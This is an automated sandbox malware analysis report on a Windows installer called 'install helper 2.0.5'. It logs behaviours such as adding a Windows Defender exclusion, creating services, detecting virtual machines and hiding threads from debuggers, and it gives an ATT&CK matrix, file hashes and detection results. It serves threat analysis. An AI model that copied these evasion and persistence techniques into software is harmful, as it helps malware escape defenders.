Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F0AB2A GetSystemTimeAsFileTime,11_2_00F0AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00FA0090 GetVersion,11_2_00FA0090
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory321
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579694 Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 88 92 Multi AV Scanner detection for submitted file 2->92 94 Found driver which could be used to inject code into processes 2->94 96 PE file contains section with special chars 2->96 98 2 other signatures 2->98 10 #U5b89#U88c5#U52a9#U624b_2.0.5.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 29 other processes 2->17 process3 file4 88 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, PE32 10->88 dropped 19 #U5b89#U88c5#U52a9#U624b_2.0.5.tmp 3 5 10->19         started        23 sc.exe 13->23         started        25 sc.exe 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 25 other processes 17->33 process5 file6 74 C:\Users\user\AppData\Local\...\update.vac, PE32 19->74 dropped 76 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->76 dropped 100 Adds a directory exclusion to Windows Defender 19->100 35 #U5b89#U88c5#U52a9#U624b_2.0.5.exe 2 19->35         started        38 powershell.exe 23 19->38         started        49 2 other processes 23->49 51 2 other processes 25->51 41 conhost.exe 27->41         started        43 conhost.exe 29->43         started        45 conhost.exe 31->45         started        47 conhost.exe 33->47         started        53 24 other processes 33->53 signatures7 process8 file9 78 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, PE32 35->78 dropped 55 #U5b89#U88c5#U52a9#U624b_2.0.5.tmp 4 16 35->55         started        102 Loading BitLocker PowerShell Module 38->102 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 80 C:\Users\user\AppData\Local\...\update.vac, PE32 55->80 dropped 82 C:\Program Files (x86)\...\trash (copy), PE32+ 55->82 dropped 84 C:\Program Files (x86)\...\is-R44JL.tmp, PE32+ 55->84 dropped 86 3 other files (1 malicious) 55->86 dropped 104 Query firmware table information (likely to detect VMs) 55->104 106 Protects its processes via BreakOnTermination flag 55->106 108 Hides threads from debuggers 55->108 110 Contains functionality to hide a thread from the debugger 55->110 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        68 cmd.exe 55->68         started        signatures13 process14 file15 90 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->90 dropped 70 conhost.exe 63->70         started        72 conhost.exe 66->72         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_2.0.5.exe0%ReversingLabs
#U5b89#U88c5#U52a9#U624b_2.0.5.exe8%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc11%ReversingLabs
C:\Program Files (x86)\Windows NT\is-R44JL.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\update.vac11%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\update.vac11%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drfalse
    high
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_2.0.5.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drfalse
          high
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2133531361.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2134065444.000000007F0AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.2135961288.0000000000861000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000000.2156757019.0000000000D1D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drfalse
              high
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2133531361.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2134065444.000000007F0AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.2135961288.0000000000861000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000000.2156757019.0000000000D1D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.drfalse
                    high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579694
                    Start date and time:2024-12-23 07:41:23 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 20s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:108
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                    renamed because original name is a hash value
                    Original Sample Name:_2.0.5.exe
                    Detection:MAL
                    Classification:mal88.evad.winEXE@126/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 28
                    • Number of non-executed functions: 74
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, backgroundTaskHost.exe
                    • Excluded IPs from analysis (whitelisted): 40.126.53.7, 20.103.156.88, 13.107.246.63, 2.16.158.50, 4.175.87.197
                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    01:42:17API Interceptor1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp modified
                    01:42:20API Interceptor29x Sleep call for process: powershell.exe modified
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                      Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                          Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                            #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                    #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                      #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                                        C:\Program Files (x86)\Windows NT\hrsw.vbc#U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                                          Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                            #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                              Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                                #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                                  #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                                    #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                                      #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                                        #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):831200
                                                          Entropy (8bit):6.671005303304742
                                                          Encrypted:false
                                                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Joe Sandbox View:
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                                          • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                          • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                          • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):249984
                                                          Entropy (8bit):7.999231321310217
                                                          Encrypted:true
                                                          SSDEEP:6144:oO69JOSTLGHS0jDdUlJ4CzxF07OkYK019Ybi:x67OY6y0jhUMCVsBjbi
                                                          MD5:11518A96514343C3195F339C0F0C514F
                                                          SHA1:FB72B4940CFC18C85BF2FC0F135F24DE70B5FE43
                                                          SHA-256:98365E00DF900A68CADE6F6D4EF1630731882177B80D326AC304ABC053AE9D78
                                                          SHA-512:978A7CFDF3AE50E96ABD7AE4C46BD9CD377F3108323CD6B8FB13A3651968C3E48FDFFE41E7B4F6E8C4144BAC78C576EB57E20B6A7DFA2F3B12802D7D1F2C01FF
                                                          Malicious:false
                                                          Preview:.@S.....i?S.,..............u.#....^..I.&..4.E.z..hg9`.[1...R....F.O...n.'............L.J.5..31.....iI*.F..S./......&w.)..:...V...uW....4........_.......B.$..F<...........D3....#.>..Yh{rO!.9>k..>..U.i...(..i.../Q...U..q.W6.._t..+(.......Z....b...OK.....p.....^...~7.....C.>.......Q....K.^.......p.|.]O....07.yy.1X.Pr.4...wm.E..2....$..5..g...2=,........7,.^`S.RM..84.Bb.&PgJV..x.9....9Z.3.)..y.O`J....O...C.?...@..d.DJ....1K..F3b.=b......W......m.e...!a..*.i...%.bA....DI..~.....q........{HQ.".......Xn.G#~0.h&...RN".~./.t....n0...7.w.2.#N.W$.<...B... z.....!Y.x$...R..A{.z.U..q.S&..G.&...`...J*.*.'.Y..9..`...:.E...d...cE...P..T.H.........=.e.X..[mR*@OT7./.v...Z.OG.p6.E^.!.e....g.........i(xc...Gb.u=......t.KV...c........|......w.x...+..6..PP..I....~.iP.....K..g>..(*..cq..........J..S..]O..[...w.K....EG..o..=.(\.....8z....5..?.R$...).xR"\A..O#v.:...RK.\...U...~<...a.h..2.h....v.wq.....*...$.&a..w."..a.j...e...hH...u.a.?tU....0.^{..cb.....
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3598848
                                                          Entropy (8bit):7.004949099807939
                                                          Encrypted:false
                                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                          Joe Sandbox View:
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                                          • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                          • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):249984
                                                          Entropy (8bit):7.999231321310217
                                                          Encrypted:true
                                                          SSDEEP:6144:oO69JOSTLGHS0jDdUlJ4CzxF07OkYK019Ybi:x67OY6y0jhUMCVsBjbi
                                                          MD5:11518A96514343C3195F339C0F0C514F
                                                          SHA1:FB72B4940CFC18C85BF2FC0F135F24DE70B5FE43
                                                          SHA-256:98365E00DF900A68CADE6F6D4EF1630731882177B80D326AC304ABC053AE9D78
                                                          SHA-512:978A7CFDF3AE50E96ABD7AE4C46BD9CD377F3108323CD6B8FB13A3651968C3E48FDFFE41E7B4F6E8C4144BAC78C576EB57E20B6A7DFA2F3B12802D7D1F2C01FF
                                                          Malicious:false
                                                          Preview:.@S.....i?S.,..............u.#....^..I.&..4.E.z..hg9`.[1...R....F.O...n.'............L.J.5..31.....iI*.F..S./......&w.)..:...V...uW....4........_.......B.$..F<...........D3....#.>..Yh{rO!.9>k..>..U.i...(..i.../Q...U..q.W6.._t..+(.......Z....b...OK.....p.....^...~7.....C.>.......Q....K.^.......p.|.]O....07.yy.1X.Pr.4...wm.E..2....$..5..g...2=,........7,.^`S.RM..84.Bb.&PgJV..x.9....9Z.3.)..y.O`J....O...C.?...@..d.DJ....1K..F3b.=b......W......m.e...!a..*.i...%.bA....DI..~.....q........{HQ.".......Xn.G#~0.h&...RN".~./.t....n0...7.w.2.#N.W$.<...B... z.....!Y.x$...R..A{.z.U..q.S&..G.&...`...J*.*.'.Y..9..`...:.E...d...cE...P..T.H.........=.e.X..[mR*@OT7./.v...Z.OG.p6.E^.!.e....g.........i(xc...Gb.u=......t.KV...c........|......w.x...+..6..PP..I....~.iP.....K..g>..(*..cq..........J..S..]O..[...w.K....EG..o..=.(\.....8z....5..?.R$...).xR"\A..O#v.:...RK.\...U...~<...a.h..2.h....v.wq.....*...$.&a..w."..a.j...e...hH...u.a.?tU....0.^{..cb.....
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5649408
                                                          Entropy (8bit):6.392614480390128
                                                          Encrypted:false
                                                          SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                          MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                          SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                          SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                          SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):56546
                                                          Entropy (8bit):7.997020385738187
                                                          Encrypted:true
                                                          SSDEEP:1536:HH0XLz6hYcW9MqEMv94PUICwNW6apEIeq0/cR:HHvvW9NE54efcR
                                                          MD5:5AE192345F0F69A9B67788EB3F38FB9B
                                                          SHA1:C9ACF1FAC77D08FB8DF1443D067D171B089EF959
                                                          SHA-256:64FE275448F9A1FB87250C7D4AD637274C259F2958E3BB58D68E722DD91E9CC7
                                                          SHA-512:A5B9AA3870DCA279A055B2CDBDD903E3A0525D23E8CD01181686ECFBFE67F6A576B924CD582256C74F0BB22100A0D02F8270B9679728C65E023E0E342AA89998
                                                          Malicious:false
                                                          Preview:.@S...._..l ..............).....TcxC..xe.Q.....?E6jnzk.g;..aW;'...!+..y.....Jc..r.U..z.f.hI4A...3t.C...<..g,...~.O.f......%x.R..s.HMG.{.......3.Vpk%.......W.........,....V..q...Ro.8,U.q...........?c.q....+.(S._...v.)~...8.P..t.R..!..9.B.....f..F.}.....s_L..w..G...;...K..z..O.`.d.Z..9...s7u.3...fe.w..Y....{...?.@.:v..F2 -.....a..s......5dV...n.${..k.F%].v.'.....9.|.y..#N..c....0...f.e6.SY......x.e......#K.0...&..i.(.J...T..t..V..gk....+^FN@J0R.Z..bB.>...xk....xh..i.!1<..A>p...y...(........[..u~q..L.OH.-Y.....".....k/1`...7..@.o.C.P.(g@...m:-..|.B...{~.-('.......;.kZ..c..y..w3u4.;...../-G.V.g....y.-hV~P......@.,...C...N.{{p..X.......*H...Tu..&...qTo..>....}P....>.:F|.....5.......$..>c...].._......b...+y..Pc..G.(...o.|.....V]/..\....^)..ERB2.X.........K\(........~^.m..v...).'..M.:...3<..e..&Uj.........,..-9.}.....VI..:..<....6R.{Tl.X....j&C....vI,*...x;....CX.......b.6[..CB....J...k.j.p. e..c.8(...v....d..,.E.!j.V...#.H..3..W.$
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):56546
                                                          Entropy (8bit):7.9970203857381925
                                                          Encrypted:true
                                                          SSDEEP:1536:drlLRqRByqzVF8GNxmsf+KlTzr3Dq9MgvNeIRlQj:dr+BtVF8GnmsxcMg1eIRSj
                                                          MD5:749867F354FA0A2E41EBC1FD6F8DC516
